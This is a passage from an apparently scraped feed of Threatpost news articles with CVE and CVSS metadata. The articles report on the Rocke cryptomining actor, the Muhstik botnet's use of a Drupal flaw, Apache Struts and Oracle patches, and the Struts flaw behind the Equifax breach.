Another file, \u201cPools.txt,\u201d appears to be a config file for XMR-stak, an open-source universal Stratum pool miner that mines Monero, Aeon and more. Both miners have the same mining pool and wallet information.\n\nOther miners in the files include \u201cBashf,\u201d a variant of XMR-stak, and \u201cbashg,\u201d a variant of XMRig.\n\nFinally, Cisco Talos said it found a file dubbed \u201cTermsHost.exe,\u201d a PE 32 Monero miner, which researchers said can be purchased online for $14 and targets malicious actors: \u201cAdvertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \u2018Windows processes to bypass firewalls,'\u201d Liebenberg wrote.\n\nThe sample first grabs the config file \u201cxmr.txt\u201d containing the same configuration information as the previous files, from Rocke\u2019s command-and-control (C2) server, and then injects code into notepad.exe, which then proceeds to communicate with the MinerGate pool.\n\n\u201cIntriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system,\u201d researchers said.\n\n## Threat Actor\n\nLiebenberg said Cisco Talos was able to discover more about Rocke through several emails associated with the threat actor\u2019s MinerGate Monero wallet (rocke@live.cn and jxci@vip.qq.com): \u201cThe majority of websites registered to Rocke list Jiangxi Province addresses for their registration,\u201d he said. \u201cSome of these websites were for Jiangxi-based businesses, such as belesu[.]com, which sells baby food\u2026 It is possible that the \u2018jx\u2019 in jxci@vip.qq.com stands for Jiangxi. 
Therefore, we assess with high confidence that Rocke operates from Jiangxi Province.\u201d\n\nThe payload is similar to one used by the [Iron Cybercrime Group](<https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/>), Cisco Talos said: \u201cBoth Iron and Rocke\u2019s malware behave similarly, and reach out to similar infrastructure,\u201d they said. \u201cSo, while we can assess with high confidence that the payloads share some code base, we are still unsure of the exact relationship between Rocke and Iron Cybercrime Group.\u201d\n\nLiebenberg pointed to cryptomining malware as increasing in popularity, with the Rocke threat actor an example of varying methods to download and execute various malware.\n\n\u201cDespite the volatility in the value of various cryptocurrencies, the trend of illicit cryptocurrency mining activity among cybercriminals shows no signs of abating,\u201d they said. \u201cRocke\u2019s various campaigns show the variety of infection vectors, malware, and infrastructure that these criminals will employ to achieve their goals.\u201d\n", "cvss3": {}, "published": "2018-08-30T20:35:39", "type": "threatpost", "title": "New Threat Actor \u2018Rocke\u2019: A Rising Monero Cryptomining Menace", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-3066"], "modified": "2018-08-30T20:35:39", "id": "THREATPOST:E43EB029B562B5665C8385E16145288A", "href": "https://threatpost.com/new-threat-actor-rocke-a-rising-monero-cryptomining-menace/137090/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-04-25T05:50:10", "description": "Researchers are warning a recently discovered and highly critical vulnerability found in Drupal\u2019s CMS platform is now being actively exploited by hackers who are using it to install cryptocurrency miners and to launch DDoS attacks via compromised systems. 
At the time of the disclosure, last month, researchers said they were not aware of any public exploits.\n\nNow Netlab 360 researchers say they have identified a botnet, dubbed Muhstik, that is taking advantage of the Drupal bug. They said multiple scans on infected Drupal instances reveal [attackers](<https://blog.netlab.360.com/botnet-muhstik-is-actively-exploiting-drupal-cve-2018-7600-in-a-worm-style-en/>) are exploiting the vulnerability by accessing a URL and then injecting exploit code. The technique allows adversaries to execute commands on targeted servers running Drupal.\n\nThe Muhstik botnet exploits Drupal vulnerability ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), impacting versions 6, 7, and 8 of Drupal\u2019s CMS platform. \u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d warned MITRE\u2019s Common Vulnerabilities and Exposures bulletin on March 28.\n\nDrupal, which also released a patch for the vulnerability in [March](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), warned that over one million sites running Drupal are impacted. Unprivileged and untrusted attackers could also modify or delete data hosted on affected CMS platforms, Drupal said.\n\nAfter further investigations, Netlab researchers said they believe at least three groups of malware were exploiting the vulnerability.\n\n\u201cWe noticed one of them has worm-propagation behavior. After investigation, we believe this botnet has been active for quite a time. 
We name it Muhstik, for this keyword keeps popping up in its binary file name and the communication IRC channel,\u201d wrote Netlab 360 researchers.\n\nAccording to Netlab, Muhstik is a variant of Tsunami, a malware strain that creates botnets with infected Linux servers and Linux-based IoT devices.\n\nMuhstik has the capability to install two coinminers \u2013 XMRig (XMR) and CGMiner \u2013 to mine the open-source, peer-to-peer Dash cryptocurrency, according to Netlab.\n\nResearchers say the botnet uses the open-source XMRig utility to mine cryptocurrency with a self-built mining pool (47.135.208.145:4871). Meanwhile, it uses popular mining software CGMiner to dig cryptocurrency coins using multiple mining tools (with username reborn.D3), they said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/04/23162156/Botnet.png>)\n\nIn addition Netlab researchers said they intercepted multiple DDoS attack instructions targeting the IP address 46[.]243[.]189[.]102.\n\nMuhstik relies on 11 command and control domains and IP addresses, and the attackers also use the IRC communication protocol to invoke commands for the botnet: \u201cWe observed multiple IRC Channels, all starting with \u2018muhstik,'\u201d said Netlab researchers in a report. \u201cAt present, we can not confirm which specific channels are open on which C2 server. This is due to the characteristics of the IRC protocol itself. Only when we receive a communication instruction from the corresponding channel can we confirm it\u2019s present.\u201d\n\nMuhstik also has capabilities to scan for vulnerable server apps using the aiox86 scanning module. 
This module \u201cscans TCP port 80, 8080, 7001, 2004, and tries varieties of different payloads on each port,\u201d according to NetLab.\n\nGreyNoise Intelligence said in a tweet that it detected the botnet exploiting a vulnerability (CVE-2017-10271) in Oracle WebLogic Server as well, indicating that Muhstik is exploiting vulnerabilities in other server applications.\n\n> UPDATE: there is a 95% overlap between the IPs scanning for the previously reported [#drupalgeddon](<https://twitter.com/hashtag/drupalgeddon?src=hash&ref_src=twsrc%5Etfw>) vulnerability and the Oracle CVE-2017-10271 vulnerability.\n> \n> \u2014 GreyNoise Intelligence (@GreyNoiseIO) [April 18, 2018](<https://twitter.com/GreyNoiseIO/status/986458691787517952?ref_src=twsrc%5Etfw>)\n\nTroy Mursch, founder of Bad Packets Report, told Threatpost that given the criticality of the exploit and the repercussions once it\u2019s used, \u201cthe race is on to find vulnerable Drupal installations.\u201d\n\n\u201cI recommend affected users update to Drupal 7.58 or 8.5.1 as soon as possible. To note as well, updating to the patched version doesn\u2019t retroactively \u2018unhack\u2019 your site. 
I recommend website operators check their installation (server) for any of the IoCs mentioned in the 360 Netlab report after completing the update,\u201d he said.\n", "cvss3": {}, "published": "2018-04-23T22:13:25", "type": "threatpost", "title": "Muhstik Botnet Exploits Highly Critical Drupal Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2018-7600"], "modified": "2018-04-23T22:13:25", "id": "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "href": "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T22:53:11", "description": "The Apache Software Foundation has patched a critical remote code execution vulnerability affecting all versions of the popular application development framework Struts since 2008.\n\nAll web applications using the framework\u2019s REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency, according to Semmle, a software engineering analytics firm that first identified the bug.\n\n\u201cThis particular vulnerability allows a remote attacker to execute arbitrary code on any server running an application built using the Struts framework and the popular REST communication plugin. 
The weakness is caused by the way Struts deserializes untrusted data,\u201d the company wrote in [a technical write-up](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) on the vulnerability published on Tuesday in coordination with the release of a patch by Apache Software Foundation (ASF).\n\n\u201cThis is as serious as it gets; if remote attackers are allowed to exploit the newly identified vulnerability it can critically damage thousands of enterprises,\u201d said Oege de Moor, CEO and founder of Semmle.\n\nAffected developers are urged to [upgrade to Apache Struts version 2.5.13](<https://struts.apache.org/announce.html#a20170905>).\n\nThe ASF said there is no workaround available for the vulnerability ([CVE-2017-9805](<https://struts.apache.org/docs/s2-052.html>)) in Struts, an open-source framework for developing web applications in the Java programming language.\n\n\u201cThe best option (sans an upgrade) is to remove the Struts REST plugin when not used or limit it to server normal pages and JSONs only,\u201d the ASF wrote in a [security bulletin issued Tuesday](<https://struts.apache.org/docs/s2-052.html>).\n\nSemmle cites estimates the vulnerability could impact 65 percent of the Fortune 100 companies that use web applications built with the Struts framework.\n\n\u201cOrganizations like Lockheed Martin, the IRS, Citigroup, Vodafone, Virgin Atlantic, Reader\u2019s Digest, Office Depot, and Showtime are known to have developed applications using the framework. This illustrates how widespread the risk is,\u201d Semmle researcher Bas van Schaik wrote Tuesday, citing estimates by analysts at the software developer research firm RedMonk.\n\nMultiple similar vulnerabilities have been reported tied to Struts. 
Earlier this year, attackers were exploiting a critical Apache Struts vulnerability on Windows servers and dropping Cerber ransomware on the machines.\n\n[In March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), public attacks and scans looking for exposed Struts 2 servers were reportedly on the rise after a vulnerability ([CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)) in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nSemmle said this most recent vulnerability is caused by the way Struts deserializes untrusted data. Deserialization is the process of taking structured data from one format and rebuilding it into an object. When the serialized input is attacker-controlled, that process can be abused, and it has been used in a host of attack scenarios including denial-of-service, access-control bypass and remote code execution attacks.\n\nThe remote code execution attack Semmle identified is possible when using the Struts REST plugin with the XStream handler to facilitate XML payloads. XStream is a Java library used to serialize objects to XML (or JSON) and back again.\n\n\u201cLgtm (Semmle\u2019s open-source [code analysis tool](<https://lgtm.com/>)) identifies alerts in code using queries written in a specially-designed language: QL. One of the many queries for Java detects potentially unsafe deserialization of user-controlled data. The query identifies situations in which unsanitized data is deserialized into a Java object. 
This includes data that comes from an HTTP request or from any other socket connection,\u201d Semmle said in a [second technical analysis of the vulnerability](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) posted Tuesday.\n\nData contained in one of the arguments (toObject) should be considered \u201ctainted\u201d and \u201cunder the control of a remote user and should not be trusted.\u201d This query detects common ways through which user-controlled data flows to a deserialization method, researchers said. \u201cHowever, some projects use a slightly different approach to receive remote user input,\u201d they said.\n\nSemmle said it has developed a \u201csimple\u201d working exploit for this vulnerability but currently has no plans to disclose it.\n\n\u201cThere is no suggestion that an exploit is publicly available, but it is likely that one will soon be,\u201d van Schaik wrote in a blog post.\n", "cvss3": {}, "published": "2017-09-05T14:10:54", "type": "threatpost", "title": "Patch Released for Critical Apache Struts Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-05T18:44:40", "id": "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "href": "https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:22", "description": "Oracle patched 250 vulnerabilities across hundreds of different products as part of its [quarterly Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) released today.\n\nRounding out the list of products with the most patches is Oracle Fusion Middleware with 38, Oracle Hospitality Applications with 37 and Oracle MySQL with 25.\n\nOf the critical patches, security researchers at Onapsis said that they identified three high-risk SQL injection vulnerabilities in 
Oracle\u2019s popular E-Business Suite (EBS).\n\n\u201cWhile all three are high-risk vulnerabilities, one (CVE-2017-10332) is very easy to exploit,\u201d said JP Perez-Etchegoyen, CTO of Onapsis.\n\nOnapsis is warning users of Oracle EBS (versions 12.1 and 12.2) that they are exposed to SQL injection vulnerabilities that could allow an attacker, over a network and without any credentials, to gain access to and modify critical documents and information such as credit card data, customer information, HR documents or financial records.\n\nPerez-Etchegoyen said each of the SQL injection vulnerabilities can easily be exploited by attackers who can disrupt, exfiltrate or manipulate data that is part of a business\u2019 enterprise resource planning, supply chain management or finance management systems.\n\n\u201cThese vulnerabilities are especially risky as an attacker would only need a web browser and network access to the EBS system HTTP interface to perform it,\u201d Perez-Etchegoyen said.\n\nOnapsis said vulnerabilities found in Oracle\u2019s EBS are on the rise, with a 29 percent increase in 2017 compared to the previous year.\n\nThe [patches come](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) just weeks after Oracle OpenWorld, where Larry Ellison, co-founder, executive chairman and chief technology officer of Oracle, stressed the importance of security during his keynote. 
Ellison also used the occasion to stress the importance of software patching in light of the [recent Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>).\n\nLast month, Oracle used an advisory as an opportunity to remind users that [in April it](<https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/>) fixed the Struts vulnerability (CVE-2017-5638) which was behind [Equifax\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>).\n\nOrganizations are falling down when it comes to patching their most important business-critical applications, Perez-Etchegoyen said.\n\nCiting a recent Ponemon Research study, Perez-Etchegoyen said fewer than half of the 600 respondents interviewed said they have a monthly plan to implement security patches for their Oracle EBS applications. Seventy percent believe it is likely their company would have a data breach due to insecure Oracle EBS applications that they have failed to secure or apply patches to.\n\nAlso part of Oracle\u2019s quarterly update are 22 new security fixes for its Java Platform, Standard Edition. Twenty of these vulnerabilities may be remotely exploitable without authentication, that is, they may be exploited over a network without requiring user credentials, Oracle said. The highest CVSS base score of vulnerabilities affecting Oracle Java SE is 9.6.\n\nImpacted are Java Advanced Management Console, Java SE, Java SE Embedded and JRockit.\n\nOracle Database Server received six security fixes with two of the vulnerabilities remotely exploitable without authentication. 
Affected Oracle Database Server components include Spatial (Apache Groovy), WLM (Apache Tomcat), Java VM, RDBMS Security, Core RDBMS and XML Database.\n", "cvss3": {}, "published": "2017-10-17T18:13:09", "type": "threatpost", "title": "Oracle Patches 250 Bugs in Quarterly Critical Patch Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10332", "CVE-2017-5638"], "modified": "2017-10-17T18:13:09", "id": "THREATPOST:0308A7143D92E14583CCD684912ABD67", "href": "https://threatpost.com/oracle-patches-250-bugs-in-quarterly-critical-patch-update/128484/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:48", "description": "Oracle released its biggest [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>) ever on Tuesday, and with it came added urgency in the form of patches for the Solaris vulnerabilities exposed by the [ShadowBrokers](<https://threatpost.com/shadowbrokers-expose-nsa-access-to-swift-service-bureaus/124996/>) last week, as well as the recent [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), also under public attack.\n\nIn all, Oracle admins have a tall order with 299 patches across most of the company\u2019s product lines; 162 of the vulnerabilities are remotely exploitable.\n\nTwo Solaris exploits were leaked by the mysterious ShadowBrokers last Friday. The Solaris attacks were included among a rash of other exploits including a laundry list of Windows attacks, many of which had [already been patched by Microsoft](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>) prior to last Friday\u2019s dump.\n\nOne of the Solaris vulnerabilities, code-named EBBISLAND, had been patched in a number of updates dating back to 2012. The other, EXTREMEPARR, was addressed on Tuesday. 
It affects Solaris 7-10 on x86 and SPARC architectures, and is a local privilege escalation issue in the [dtappgather](<https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh>) component. Oracle patched versions 10 and 11.3 on Tuesday.\n\nResearcher Matthew Hickey of U.K. consultancy Hacker House, said the EXTREMEPARR attacks go back to Solaris 7, while EBBISLAND affects Solaris 6-10, and is a remote RPC services exploit. Both exploits allow attackers to elevate privileges to root and run shells on a compromised server.\n\n> I said in December that EBBISLAND was likely an exploit for Solaris 6 through 10, I am today confirmed correct (upto 9, still untested) <https://t.co/A3fC7BuwcK>\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 8, 2017](<https://twitter.com/hackerfantastic/status/850802122224488452>)\n\n\u201cAs a security researcher it was an extremely interesting find to discover such well written exploits in a public data dump,\u201d Hickey wrote in a [report](<https://www.myhackerhouse.com/easter-egg-hunt_greetz/#sthash.YMmAy8Ez.dpuf>) published today, \u201ceven though the bug was a trivial path traversal for \u2018dtappgather\u2019 extensive steps had been taken to protect the attack specifics in the binary and a well tested tool which worked flawlessly on all tested hosts was included.\u201d\n\nSince last August, the ShadowBrokers have periodically released tools belonging to the Equation Group, widely believed to be the U.S. National Security Agency. 
The Solaris attacks are of particular concern since Solaris systems are the backbone of many enterprise-grade server environments.\n\n> The NSA had the power to hack any Oracle Solaris box in the world via UDP/TCP generically with anti-forensics capabilities and it's public.\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 10, 2017](<https://twitter.com/hackerfantastic/status/851561358516736000>)\n\n\u201cThis vulnerability can be exploited remotely without authentication or any information about the targeted machine,\u201d said Amol Sarwate, director of [Qualys Vulnerability Labs](<https://blog.qualys.com/laws-of-vulnerabilities/2017/04/18/oracle-plugs-struts-hole-along-with-299-total-vulnerabilities>). \u201cThese are very critical vulnerabilities.\u201d\n\nThe [Apache Struts 2 vulnerability](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>) has been public since early March, though it\u2019s been publicly exploited for much longer. The flaw is in the Jakarta Multipart parser in Struts 2 2.3 before 2.3.32 and in 2.5 before 2.5.10.1. A remote attacker could send a request whose Content-Type header carries a malicious expression, which the parser evaluates, giving the attacker code execution on the server. Public scans and attacks ramped up immediately upon disclosure of the issue and development of a Metasploit module. Linux-based DDoS bots were behind most of the exploit attempts, but a spate of attacks were detected attempting to install [Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable Windows servers.\n\nOracle patched Struts 2 in 25 of its products, including 19 different instances of its Oracle Financial Services Applications. Most of these Oracle applications, however, are not internet-facing and live behind an enterprise firewall.\n\n\u201cThat could be a little bit of a saving grace for some of these services,\u201d Qualys\u2019 Sarwate said. 
There could be some instances, however, where these apps are exposed to the public network for remote administration purposes, for example. There are also some cases in which admins may be learning for the first time that Struts 2 is running inside an Oracle product. \u201cFor a normal admin, it could be a little difficult unless a vendor tells them these are the products you\u2019re running that are affected by the Struts 2 vulnerability. It could take some admins by surprise.\u201d\n\nWhile there were 47 patches in total for the financial applications suite, the MySQL database also received a hefty load of 39 fixes, 11 of which are remotely exploitable without authentication. The Oracle Retail Applications suite also had 39 vulnerabilities addressed, 32 of which were remotely exploitable. Oracle Fusion Middleware received 31 patches, 20 of which were for remotely exploitable vulnerabilities.\n\nThe previous record for quarterly Oracle patches was last July when [276 patches](<https://threatpost.com/oracle-patches-record-276-vulnerabilities-with-july-critical-patch-update/119373/>) were released; January\u2019s update, the first for 2017, had [270 patches](<https://threatpost.com/oracle-patches-270-vulnerabilities-in-years-first-critical-patch-update/123155/>).\n", "cvss3": {}, "published": "2017-04-19T07:20:09", "type": "threatpost", "title": "Record Oracle Patch Update Addresses ShadowBrokers, Struts 2 Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2017-04-21T19:31:17", "id": "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "href": "https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:10", "description": "A group of developers behind Apache Struts, believed by some to be the culprit behind [last week\u2019s 
Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>), took umbrage at those claims over the weekend.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, wrote Saturday that if Struts was targeted, it\u2019s unclear which vulnerability, if any, was exploited.\n\n[The letter](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>), which was written on behalf of the Struts PMC, was spurred by an internal analyst report published last week that suggested data from Equifax\u2019s servers was breached via an unnamed Apache Struts flaw.\n\nThe report, penned by Jeffrey Meuler, a senior research analyst with Baird Equity Research, the research arm of the financial services firm Robert W. Baird & Co, did not provide a source for the finding. Meuler did not immediately return a request for further comment when contacted on Monday.\n\nGielen\u2019s letter took particular issue with a Quartz.com article that initially alleged CVE-2017-9805, a critical remote code execution vulnerability that the ASF [patched last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), was the Struts vulnerability to blame for the breach of 143 million Americans\u2019 records. The [Quartz article](<https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/>) \u2013 since edited \u2013 initially claimed that CVE-2017-9805 had existed in the wild for nine years, something Gielen had a hard time buying. 
Gielen said Saturday that since the breach was detected back in July, it\u2019s likely the Equifax attackers either used an unknown Struts zero day or an earlier announced vulnerability on an unpatched Equifax server.\n\nGielen says the ASF takes \u201cenormous efforts\u201d to secure software it produces, like Struts, and makes a conscious effort to hold back sensitive information around vulnerabilities. There is no silver bullet for preventing exploits from surfacing in the wild however.\n\n\u201cSince vulnerability detection and exploitation has become a professional business, it is and always will be likely that attacks will occur even before we fully disclose the attack vectors, by reverse engineering the code that fixes the vulnerability in question or by scanning for yet unknown vulnerabilities.\u201d\n\nIf the attackers had used CVE-2017-9805, it would have been considered a zero day at the time, but according to Gielen, the Apache PMC was only recently notified of the vulnerability \u2013 something it quickly remedied.\n\n\u201cWe were notified just recently on how a certain piece of code can be misused, and we fixed this ASAP,\u201d Gielen said, \u201cWhat we saw here is common software engineering business \u2014 people write code for achieving a desired function, but may not be aware of undesired side-effects. Once this awareness is reached, we as well as hopefully all other library and framework maintainers put high efforts into removing the side-effects as soon as possible. 
It\u2019s probably fair to say that we met this goal pretty well in case of CVE-2017-9805.\u201d\n\nGielen concluded his letter with a series of best practices for businesses that use Apache Struts: know which frameworks and libraries are used in their setup, establish processes to roll out security fixes, and, perhaps most importantly, understand that complex software can contain flaws.\n\nAn Apache spokeswoman [told Reuters on Friday](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) that it appeared Equifax had not applied patches for flaws discovered this year.\n\nIt\u2019s unclear exactly which vulnerability the spokeswoman was referring to. The Struts vulnerability fixed last week affected all web apps that used the framework\u2019s REST plugin. Another Struts vulnerability, CVE-2017-5638, was publicized and incorporated into Metasploit [in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>). That flaw stemmed from Struts\u2019 Jakarta Multipart parser upload functionality and allowed an unauthenticated attacker to execute arbitrary code on a Struts server with a single crafted request. Researchers with Cisco Talos, [who found the bug](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>), said it was being exploited in the wild when it was disclosed.\n\nResearchers with Contrast Security posit it\u2019s more likely the attacker used CVE-2017-5638, an expression language injection vulnerability leveraged via the Content-Type header, to hit Equifax.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. 
It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Jeff Williams, Contrast\u2019s co-founder and chief technology officer, [wrote Saturday](<https://www.contrastsecurity.com/security-influencers/a-week-of-web-application-hacks-and-vulnerabilities>).\n\nWilliams echoed a few sentiments made by Gielen, including the fact that maintaining the security of libraries can be tricky but should remain a focus for businesses.\n\n\u201cKeeping libraries up to date isn\u2019t a small amount of work, as these changes come out frequently. Often these changes require rewriting, retesting, and redeploying the application, which can take months. I have recently talked with several large organizations that took over four months to deal with CVE-2017-5638,\u201d Williams said.\n\nEquifax, which has yet to respond to a request for comment for this article or [previous](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) [articles](<https://threatpost.com/many-questions-few-answers-for-equifax-breach-victims/127886/>), remains in damage control mode.\n\nThe company on Monday said it would be changing how it generates PINs for customers who want to initiate a security freeze on their accounts. The change was presumably a response to a series of tweets that went viral on Friday night calling out Equifax for issuing predictable PINs derived from the date and time they were requested, a format the company allegedly has followed for more than a decade.\n\n> OMG, Equifax security freeze PINs are worse than I thought. If you froze your credit today 2:15pm ET for example, you'd get PIN 0908171415.\n> \n> \u2014 Tony Webster (@webster) [September 9, 2017](<https://twitter.com/webster/status/906346071210778625>)\n\nThe company said in an update to its site that going forward consumers placing a security freeze will be given a randomly generated PIN. 
Users who previously froze their credit will have to mail the company directly to change it, however.\n\n> Equifax's security freeze system is now generating random PINs. If you already got one though, you have to MAIL them to change it. Fail. [pic.twitter.com/fOrtvgkmGd](<https://t.co/fOrtvgkmGd>)\n> \n> \u2014 Tony Webster (@webster) [September 11, 2017](<https://twitter.com/webster/status/907242378829889537>)\n\nThe company on Monday also apologized for lengthy call center wait times and stressed that users who sign up for TrustedID Premier, the company\u2019s ID theft protection and credit monitoring service, will not be automatically charged when the year runs out.\n\nThe company also took a moment on Monday to reiterate that signing up for the free credit monitoring service doesn\u2019t waive a consumer\u2019s right to take legal action.\n\nThe company clarified its TrustedID Premier policy on Friday afternoon after it was pressed repeatedly by consumers and politicians alike. One politician in particular, Eric Schneiderman, New York\u2019s Attorney General, opened a formal investigation into the breach on Friday, calling out the company\u2019s arbitration clause policy.\n\nAs expected, multiple lawsuits have been filed against the company in the wake of the breach. One class action suit, filed late Thursday night, alleges Equifax \u201cnegligently failed to maintain adequate technological safeguards to protect [the plaintiffs\u2019] information from unauthorized access by hackers.\u201d The suit seeks as much as $70 billion in damages nationally.\n\n\u201cEquifax knew and should have known that failure to maintain adequate technological safeguards would eventually result in a massive data breach,\u201d the complaint also reads.\n\n_*This article was updated at 5 p.m. 
to include insight from Contrast Security re: CVE-2017-5638 and Equifax._\n", "cvss3": {}, "published": "2017-09-11T15:02:31", "type": "threatpost", "title": "Apache Foundation Refutes Involvement in Equifax Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-20T19:57:18", "id": "THREATPOST:477B6029652B76463B5C5B7155CDF736", "href": "https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:10", "description": "Equifax said the culprit behind [this summer\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) was indeed CVE-2017-5638, an Apache Struts vulnerability patched back in March.\n\nThe bug was widely assumed by experts to be the \u201cU.S. website application vulnerability\u201d implicated by the company last Thursday, especially after an Apache spokeswoman [told Reuters](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) on Friday that it appeared the consumer credit reporting agency hadn\u2019t applied patches for flaws discovered earlier this year.\n\nOn Wednesday the company specified the flaw in a statement [posted to its site](<https://www.equifaxsecurity2017.com/>) and stressed it was continuing to work alongside law enforcement to investigate the incident.\n\n> \u201cEquifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. 
We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\u201d\n\nUntil the news broke on Wednesday, there was still confusion over which Struts vulnerability the attackers used.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, [wrote in an open letter over the weekend](<https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/>) that attackers either used an unknown Struts zero day or an earlier announced vulnerability. A separate remote code execution bug, CVE-2017-9805, was fixed in Struts [last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) but Gielen said the Apache PMC would have known about it if it was being exploited in July.\n\nAn internal report last week from equity research firm Baird said a Struts vulnerability was behind the breach as well. The analyst who penned the report failed to specify which vulnerability and neglected to state how he arrived at that conclusion, however.\n\nJeff Williams, chief technology officer of Contrast Security, wrote last Saturday that CVE-2017-5638 was likely to blame for the breach.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Williams wrote, adding on Thursday that he was familiar with several large organizations which took months to fix the bug.\n\n\u201cThe process of rewriting, retesting, and redeploying can take months. I just visited one of the largest telecom providers where this effort took more than four months and millions of dollars. 
